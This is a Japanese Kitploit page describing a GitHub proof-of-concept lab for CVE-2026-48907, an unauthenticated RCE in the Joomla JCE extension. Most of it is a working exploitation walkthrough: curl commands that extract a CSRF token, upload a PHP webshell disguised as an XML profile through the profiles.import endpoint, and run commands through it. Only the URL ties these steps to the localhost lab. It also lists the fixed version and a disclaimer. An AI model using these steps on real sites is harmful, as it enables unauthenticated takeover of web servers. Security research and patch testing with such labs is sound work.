Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-48907 — CVE-2026-48907 の POC | Kitploit
ツール/GitHubGitHub/pssec-io/cve-2026-48907
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育ペイロード開発ラボと実践
GitHubpssec-io/cve-2026-48907

CVE-2026-48907

CVE-2026-48907 の POC

リポジトリを見る
11ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-48907 — Joomla JCE 未認証 RCE ラボ

PSsec CVE-2026-48907 の教育用セキュリティ研究ラボ。


概要

CVE-2026-48907 は、Joomla で最も広く導入されているエディタ拡張機能である JCE (Joomla Content Editor) における、重大 (CVSS 10.0) な未認証リモートコード実行の脆弱性であり、すべてのバージョン ≤ 2.9.99.4 に影響します。

profiles.import エンドポイントは、認証なしでファイルアップロードを受け付けます。攻撃者は、XML プロファイルを装った悪意のある PHP ファイルをアップロードでき、そのファイルはサーバーの tmp/ ディレクトリに書き込まれ、HTTP 経由で直接実行されます — 資格情報は不要です。

詳細値
CVECVE-2026-48907
CVSS スコア10.0 重大
影響を受けるバージョンJCE ≤ 2.9.99.4
修正済みバージョンJCE ≥ 2.9.99.5
CISA KEV 登録はい — 2026年6月16日
積極的に悪用されているはい

ラボのセットアップ

前提条件

  • Docker + Docker Compose
  • Kali Linux (または任意の Linux ホスト)

1. 脆弱な環境を起動する

root@kitploit:~
docker compose up -d

2. Joomla インストーラーを完了する

ブラウザで http://localhost:8080 を開き、以下の資格情報を使用してセットアップウィザードを完了します:

フィールド値
データベースホストdb
データベース名joomla
データベースユーザーjoomla
データベースパスワード

3. 脆弱な JCE 拡張機能をインストールする

root@kitploit:~
wget https://github.com/widgetfactory/jce/releases/download/2.9.99.4/pkg_jce_29994.zip

次に、Joomla 管理画面 → システム → 拡張機能 → インストール → ZIP をアップロードします。


悪用

4. CSRF トークンとセッション Cookie を抽出する

root@kitploit:~
URL=http://localhost:8080
TOKEN=$(curl -s -c cookies.txt "$URL/" \
  | sed -n 's/.*"csrf\.token"[[:space:]]*:[[:space:]]*"\([a-f0-9]\{32\}\)".*/\1/p; s/.*name="\([a-f0-9]\{32\}\)"[^>]*value="1".*/\1/p' \
  | head -n1)

5. 未認証のプロファイルインポートを介して PHP ウェブシェルをアップロードする

root@kitploit:~
curl -i -s -b cookies.txt -c cookies.txt \
  -F "[email protected];type=application/xml" \
  -F "task=profiles.import" \
  -F "${TOKEN}=1" \
  "$URL/index.php?option=com_jce"

6. リモートコード実行を検証する

root@kitploit:~
curl -i -s -b cookies.txt -c cookies.txt \
  "$URL/tmp/shell.xml.php?cmd=id"

期待される出力: uid=33(www-data) gid=33(www-data)


ファイル

ファイル説明
docker-compose.yml脆弱な Joomla 5.3.1 + MySQL 8.0 を起動します
shell.xml.php最小限の PHP ウェブシェルペイロード
instructions.txtステップバイステップの悪用手順メモ

修復

直ちに JCE を バージョン 2.9.99.5 以降 に更新してください。

公式ベンダーアドバイザリと旧バージョンの Joomla 向け無料パッチ: JCE セキュリティ更新 — joomlacontenteditor.net


クレジット

  • エクスプロイトツールの参考: ynsmroztas による JoomlaSniper
  • この脆弱性は、mySites.guru の Phil Taylor によって実地で発見されました
  • CISA KEV 登録: 2026年6月16日

免責事項

このリポジトリは、教育目的および許可されたセキュリティ研究専用 です。

テストは、所有している、または明示的な書面による許可を得た システムに対してのみ実施してください。所有していないシステムに対するこの資料の不正使用は、違法かつ非倫理的です。著者および Pansophical OU は、このコンテンツの誤用について一切の責任を負いません。

このラボ環境は意図的に脆弱です。インターネットや信頼できないネットワークに公開しないでください。


PSsec 著

ツールをダウンロード
joomlapass